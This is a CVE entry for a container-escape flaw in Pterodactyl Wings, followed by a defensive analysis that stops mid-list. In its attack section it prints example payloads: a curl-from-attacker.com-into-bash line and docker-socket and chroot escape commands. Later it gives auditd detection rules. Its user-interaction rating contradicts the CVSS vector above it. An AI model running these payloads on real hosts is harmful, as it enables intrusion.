CVE-2023-32080
CVE-2023-32080
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- Low
- User Interaction
- Required
- Scope
- Changed
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
Wings is the server control plane for Pterodactyl Panel. A vulnerability affecting versions prior to 1.7.5 and versions 1.11.0 prior to 1.11.6 impacts anyone running the affected versions of Wings. This vulnerability can be used to gain access to the host system running Wings if a user is able to modify an server's install script or the install script executes code supplied by the user (either through environment variables, or commands that execute commands based off of user data). This vulnerability has been resolved in version `v1.11.6` of Wings, and has been back-ported to the 1.7 release series in `v1.7.5`. Anyone running `v1.11.x` should upgrade to `v1.11.6` and anyone running `v1.7.x` should upgrade to `v1.7.5`. There are no workarounds aside from upgrading. Running Wings with a rootless container runtime may mitigate the severity of any attacks, however the majority of users are using container runtimes that run as root as per the Wings documentation. SELinux may prevent attackers from performing certain operations against the host system, however privileged containers have a lot of freedom even on systems with SELinux enabled. It should be noted that this was a known attack vector, for attackers to easily exploit this attack it would require compromising an administrator account on a Panel. However, certain eggs (the data structure that holds the install scripts that get passed to Wings) have an issue where they are unknowingly executing shell commands with escalated privileges provided by untrusted user data.
CVE-2023-32080: Professional Cybersecurity Analysis
Executive Summary
CVE-2023-32080 represents a critical privilege escalation vulnerability in Pterodactyl Wings, the server control plane component of the Pterodactyl Panel game server management platform. With a CVSS score of 9.0, this vulnerability enables attackers to escape container isolation and gain unauthorized access to the host system through malicious manipulation of server installation scripts.
1. Vulnerability Assessment and Severity Evaluation
Severity Classification
- CVSS Score: 9.0 (Critical)
- Attack Complexity: Low to Medium
- Privileges Required: Low (authenticated user with server modification capabilities)
- User Interaction: None
- Scope: Changed (container escape to host system)
- Impact: Complete system compromise
Technical Assessment
This vulnerability represents a container escape scenario where insufficient input validation and privilege separation in the Wings installation script execution mechanism allows attackers to break out of containerized environments and execute arbitrary code on the host system with elevated privileges.
Key Risk Factors:
- Direct path to host system compromise
- Affects core infrastructure component
- Exploitable through multiple vectors
- Default configurations run containers as root
- Wide deployment in game server hosting environments
Severity Justification
The critical rating is warranted due to:
- Complete host compromise potential - Full control over the underlying infrastructure
- Lateral movement opportunities - Access to all containers and services on the host
- Data exfiltration risks - Access to sensitive configuration, credentials, and customer data
- Service disruption capability - Ability to terminate or manipulate all hosted services
- Persistence mechanisms - Attackers can establish backdoors at the host level
2. Attack Vectors and Exploitation Methods
Primary Attack Vectors
Vector 1: Malicious Install Script Modification
Prerequisites:
- Authenticated access to Pterodactyl Panel
- Permissions to modify server installation scripts (typically administrator role)
Exploitation Process:
1. Attacker gains admin panel access (credential compromise, social engineering)
2. Modifies or creates custom "egg" with malicious install script
3. Install script contains commands designed to escape container
4. Script executes with elevated privileges during server installation
5. Malicious code breaks container isolation
6. Attacker gains host system access
Vector 2: User-Supplied Data Injection
Prerequisites:
- Ability to control environment variables or user data passed to install scripts
- Vulnerable egg configuration that executes commands based on user input
Exploitation Process:
1. Attacker identifies egg that processes user-supplied data
2. Crafts malicious payload in environment variables or configuration fields
3. Payload contains shell metacharacters or command injection sequences
4. Install script executes user data without proper sanitization
5. Injected commands execute with container privileges
6. Container escape techniques deployed to reach host
Exploitation Techniques
Container Escape Methods:
- Mount namespace manipulation - Accessing host filesystem through improper mount configurations
- Privileged container abuse - Leveraging elevated container capabilities
- Docker socket access - If exposed, direct control over container runtime
- Kernel exploitation - Using host kernel vulnerabilities from within container
- cgroup manipulation - Breaking resource isolation boundaries
Example Attack Payload Structure:
# Injected into install script or environment variable
$(curl attacker.com/escape.sh | bash)
# or
; mount -t proc none /host_proc && chroot /host_proc /bin/bash
# or
`docker -H unix:///var/run/docker.sock run -v /:/hostfs alpine chroot /hostfs`
Attack Chain Complexity
Low Complexity Scenario:
- Compromised administrator credentials → Direct script modification → Immediate host access
Medium Complexity Scenario:
- Lower-privileged user → Identify vulnerable egg → Craft injection payload → Trigger installation → Host access
3. Affected Systems and Software Versions
Vulnerable Versions
Wings 1.11.x Series:
- All versions prior to v1.11.6
- Versions 1.11.0 through 1.11.5 (inclusive)
Wings 1.7.x Series:
- All versions prior to v1.7.5
- Legacy deployments running older 1.7 branch
Affected Deployment Scenarios
High-Risk Environments:
- Multi-tenant game server hosting providers - Shared infrastructure with multiple customers
- Community game server platforms - Multiple administrators with varying trust levels
- Automated provisioning systems - High-volume server creation with user-defined configurations
- Development/testing environments - Often overlooked for security updates
Infrastructure Components at Risk:
- Host operating system (typically Linux distributions)
- Container runtime (Docker, containerd)
- All co-located containers on the same host
- Network infrastructure accessible from host
- Storage systems mounted to host
- Credential stores and secrets management systems
Deployment Statistics Context
Pterodactyl Panel is widely deployed in:
- Game server hosting industry
- Educational institutions
- Community gaming platforms
- Private game server deployments
The actual exposure depends on:
- Number of untrusted administrators
- Custom egg repositories in use
- Security posture of panel access controls
4. Recommended Mitigation Strategies
Immediate Actions (Priority 1)
1. Patch Deployment
Critical Timeline: Within 24-48 hours
For Wings 1.11.x deployments:
- Upgrade to v1.11.6 immediately
- Command: Update through package manager or direct binary replacement
For Wings 1.7.x deployments:
- Upgrade to v1.7.5 immediately
- Consider migration path to 1.11.x for long-term support
Upgrade Verification:
# Verify Wings version
wings --version
# Check running process version
ps aux | grep wings
systemctl status wings
2. Access Control Audit
- Review all administrator accounts on Pterodactyl Panel
- Implement principle of least privilege
- Revoke unnecessary administrative access
- Enable multi-factor authentication for all admin accounts
- Audit recent administrative actions for suspicious activity
3. Install Script Review
Action Items:
- Audit all custom eggs in use
- Review install scripts for command injection vulnerabilities
- Identify scripts that execute user-supplied data
- Temporarily disable untrusted or custom eggs
- Implement code review process for egg modifications
Short-Term Mitigations (Priority 2)
1. Enhanced Monitoring
Deploy detection mechanisms:
- Monitor for unexpected host system access from container namespaces
- Alert on privilege escalation attempts
- Log all install script executions
- Track egg modifications and installations
- Monitor container runtime API calls
- Detect unusual process spawning patterns
Detection Signatures:
# Auditd rules for container escape detection
-a always,exit -F arch=b64 -S mount -F key=container_escape
-a always,exit -F arch=b64 -S unshare -F key=namespace_manipulation
-w /var/run/docker.sock -p wa -k docker_socket_access
2. Network Segmentation
- Isolate Wings hosts on dedicated network segments
- Implement strict firewall rules between container hosts
- Restrict outbound connectivity from container networks
- Deploy intrusion detection systems (IDS) on host networks
3. Incident Response Preparation
Prepare for potential compromise:
- Document all Wings deployments and versions
- Create host system snapshots/backups
- Establish incident response procedures
- Prepare forensic collection capabilities
- Document rollback procedures
Long-Term Security Enhancements (Priority 3)
1. Rootless Container Implementation
Transition Strategy:
- Evaluate rootless container runtime compatibility
- Test Wings functionality with rootless Docker/Podman
- Implement user namespace remapping
- Deploy in phases across infrastructure
Configuration Example:
{
"userns-remap": "default",
"no-new-privileges": true
}
2. SELinux/AppArmor Enforcement
Mandatory Access Control Implementation:
- Enable SELinux in enforcing mode
-